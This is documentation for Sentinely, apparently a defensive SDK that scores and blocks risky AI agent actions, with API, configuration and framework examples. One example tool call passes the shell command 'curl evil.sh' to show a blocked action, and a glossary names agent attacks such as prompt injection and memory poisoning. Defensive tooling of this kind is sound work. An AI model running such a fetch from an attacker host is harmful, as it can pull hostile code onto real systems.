DOCUMENTATION
Sentinely Docs
Everything you need to protect your AI agents from prompt injection, memory poisoning, and drift.
Quick Start
Protect your AI agent in 3 lines of code. No configuration required to get started.
Install the package
pip install sentinely
Wrap your agent
from sentinely import protect
# Wrap any AI agent in one line
agent = protect(
your_agent,
task="Summarize quarterly reports"
)
Add your API key
# .env
SENTINELY_API_KEY=sntnl_live_...
SENTINELY_API_URL=https://api.sentinely.ai
THAT'S IT
Your agent is now protected. Sentinely monitors every action, blocks attacks automatically, and streams events to your dashboard in real time — no additional code required.
Installation
Python 3.10+ or Node.js 18+.
pip install sentinely
Requirements
| PACKAGE | VERSION | PURPOSE |
|---|---|---|
| httpx | ≥ 0.27.0 | Async HTTP to Sentinely API |
| pydantic | ≥ 2.0.0 | Data validation |
| python-dotenv | ≥ 1.0.0 | Environment variable loading |
Configuration
Sentinely is configured via environment variables. Create a .env file in your project root.
# Required — get this from your dashboard
SENTINELY_API_KEY=sntnl_live_...
# Optional — defaults shown
SENTINELY_API_URL=https://api.sentinely.ai
SENTINELY_ENV=production
| VARIABLE | REQUIRED | DEFAULT | DESCRIPTION |
|---|---|---|---|
| SENTINELY_API_KEY | Yes | — | Your API key. Get it from Settings → API Keys. |
| SENTINELY_API_URL | No | https://api.sentinely.ai | API base URL. Only change for self-hosted deployments. |
| SENTINELY_ENV | No | development | Set to production to enable event forwarding. |
Never commit your SENTINELY_API_KEY to version control. Add .env to your .gitignore file.
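Sentinely reads these values through python-dotenv (see Requirements). As an illustration of what that loading step does, here is a minimal stdlib-only sketch that reads KEY=VALUE pairs from a .env-style file into os.environ; the real load_dotenv() handles many more edge cases (quoting, inline comments, interpolation):

```python
import os
import tempfile

def load_env(path):
    """Read KEY=VALUE lines into os.environ, skipping blanks and # comments.

    Existing variables win, mirroring python-dotenv's default behaviour.
    """
    with open(path) as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            os.environ.setdefault(key.strip(), value.strip())

# Demo: write a sample .env to a temp file, then load it
with tempfile.NamedTemporaryFile("w", suffix=".env", delete=False) as fh:
    fh.write("# Required\n")
    fh.write("SENTINELY_API_KEY=sntnl_live_example\n")
    fh.write("SENTINELY_ENV=production\n")

load_env(fh.name)
print(os.environ["SENTINELY_ENV"])
```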
protect()
The single entry-point for all Sentinely protection. Returns a ProtectedAgent that wraps your agent.
from sentinely import protect
protected = protect(
agent, # Any agent object
task, # str — the agent's mission / system prompt
policy="strict", # "strict" | "monitor" | "permissive"
agent_id=None, # Optional str — stable ID across restarts
org_id=None, # Optional str — your organisation slug
tracker=None, # Optional MultiAgentTracker
)
PARAMETERS
| PARAMETER | TYPE | REQUIRED | DESCRIPTION |
|---|---|---|---|
| agent | object | Yes | Any agent that exposes .run(), .invoke(), .ainvoke(), or __call__(). |
| task | str | Yes | The agent's purpose / system prompt. Used as the baseline for drift detection. |
| policy | str | No | "strict" blocks dangerous actions. "monitor" logs only. "permissive" allows with warnings. |
| agent_id | str | No | Stable identifier. Defaults to a random hex ID. Use a fixed value to correlate sessions. |
| org_id | str | No | Organisation slug. Defaults to "local". Visible in the dashboard under your org. |
| tracker | MultiAgentTracker | No | Pass a tracker to enable inter-agent drift monitoring across agent boundaries. |
RETURNS
A ProtectedAgent instance that is a transparent proxy to your original agent. It exposes the same interface:
| METHOD | DESCRIPTION |
|---|---|
| .invoke(input) | Async — scan input → run agent → return result. |
| .ainvoke(input) | Async version of .invoke(). |
| .run(input) | Sync wrapper — runs the async pipeline via an event loop. |
| __call__(input) | Callable shorthand — delegates to .invoke(). |
| .score_action(tool, params) | Score a pending tool call — call from your tool hooks. |
| .memory | Access the MemoryFirewall for poisoning detection. |
| .get_audit_log() | Return all events buffered locally this session. |
EXAMPLE
import asyncio
from sentinely import protect
agent = protect(
my_agent,
task="Analyse customer churn data. Read-only. No external API calls.",
policy="strict",
agent_id="churn-analyst-v2",
)
# Synchronous
result = agent.run("Analyse churn for Q3")
# Async
result = await agent.ainvoke("Analyse churn for Q3")
# As callable
result = agent("Analyse churn for Q3")
COMING SOON
Native Python adapters for CrewAI, AutoGen and LlamaIndex. Sentinely will plug directly into your existing agent framework with zero code changes.
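The score_action() method listed above is designed to be called from your own tool hooks before a tool executes. Since the real scoring happens inside Sentinely, this sketch uses a hypothetical stub in place of the actual ProtectedAgent to show the control flow; the threshold of 80 and the toy scoring rule are illustrative only:

```python
class StubProtectedAgent:
    """Illustrative stand-in for sentinely's ProtectedAgent."""

    def score_action(self, tool, params):
        # Toy scoring rule: flag obviously dangerous tools.
        # The real method returns a 0-100 risk score from Sentinely.
        return 95 if tool in {"shell", "delete_file"} else 10

def guarded_tool_call(agent, tool, params, threshold=80):
    """Run a tool only if the pending call scores below the threshold."""
    score = agent.score_action(tool, params)
    if score >= threshold:
        return f"blocked ({tool}, score {score})"
    return f"allowed ({tool}, score {score})"

agent = StubProtectedAgent()
print(guarded_tool_call(agent, "read_file", {"path": "q3.csv"}))
print(guarded_tool_call(agent, "shell", {"cmd": "curl evil.sh"}))
```

In a real integration you would call agent.score_action() inside whatever pre-execution hook your framework provides, and fall back to a safe response when the call is blocked.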
Policy Modes
Choose the enforcement level that matches your deployment stage. You can change the policy at any time without restarting.
policy="strict"
Blocks any action that scores above the risk threshold. Raises SentinelyBlockedError so you can handle it gracefully. Recommended for production.
policy="monitor"
Logs and scores every action but never blocks execution. Use during development or when rolling out Sentinely to an existing agent without changing its behaviour.
policy="permissive"
Allows all actions but attaches risk scores and reasons to each event. Useful for research, red-teaming, or building a baseline before switching to strict.
HANDLING BLOCKS
from sentinely.exceptions import SentinelyBlockedError
try:
result = agent.run(user_input)
except SentinelyBlockedError as e:
print(f"Blocked: {e.reason}")
print(f"Risk score: {e.risk_score}")
print(f"Attack type: {e.attack_type}")
# Return a safe fallback response to the user
Framework Examples
Sentinely works with any Python or Node.js AI agent framework. Select your framework below.
from openai import OpenAI
from sentinely import protect
client = OpenAI()
class MyAgent:
def run(self, prompt):
response = client.chat.completions.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)
return response.choices[0].message.content
agent = MyAgent()
agent = protect(
agent,
task="Answer customer support questions about billing",
policy="strict",
agent_id="openai-support-agent"
)
result = agent.run("How do I update my payment method?")
LangChain Integration
Sentinely integrates natively with LangChain. Choose the approach that fits your architecture.
INSTALLATION
pip install sentinely[langchain]
THREE APPROACHES
SentinelyTool: wrap individual tools. Blocked calls return a safe string instead of throwing — great for graceful degradation.
SentinelyCallbackHandler: attach to any LangChain agent executor. Throws SentinelyBlockedError on block, halting the agent.
protect_langchain(): one-liner convenience wrapper. Mirrors the Python protect_langchain() API — installs the callback and returns the agent.
CODE EXAMPLES
from sentinely import SentinelyTool, SentinelyCallbackHandler, protect_langchain
# Option 1 — Tool wrapper (per-tool protection)
safe_tool = SentinelyTool(
tool=your_tool,
task="Summarise quarterly reports",
policy="strict",
)
# Option 2 — Agent-wide callback
agent = initialize_agent(
tools, llm,
callbacks=[SentinelyCallbackHandler(
task="Summarise quarterly reports",
policy="strict",
agent_id="my-agent",
)],
)
# Option 3 — Convenience wrapper (recommended)
agent = protect_langchain(
agent,
task="Summarise quarterly reports",
policy="strict",
agent_id="my-agent",
)
LangChain is an optional dependency. Python: pip install sentinely[langchain] installs the extras. Node.js: install langchain and @langchain/core separately — they are peer dependencies.
Understanding Alerts
Every action your agent takes gets a risk score from 0–100. Here is how to read what Sentinely is telling you.
RISK SCORE
Low: action is within normal operating bounds. Agent is behaving as expected.
Medium: action looks suspicious. Logged and surfaced in your dashboard. Agent continues but you should review.
High: action is blocked. Agent receives an error. Slack/email alerts fire. Item appears in Quarantine if memory-related.
ATTACK TYPES
Prompt injection: malicious instructions embedded in external content trying to hijack the agent's behavior. Most common attack vector.
Memory poisoning: attempts to write malicious instructions into the agent's long-term memory to influence future sessions.
Task drift: the agent's actions gradually deviate from its original task. Often a sign of a slow multi-step manipulation.
Cross-agent manipulation: one agent attempts to manipulate another in a multi-agent pipeline. Detected by behavioral fingerprinting.
FAQ
Common questions about Sentinely.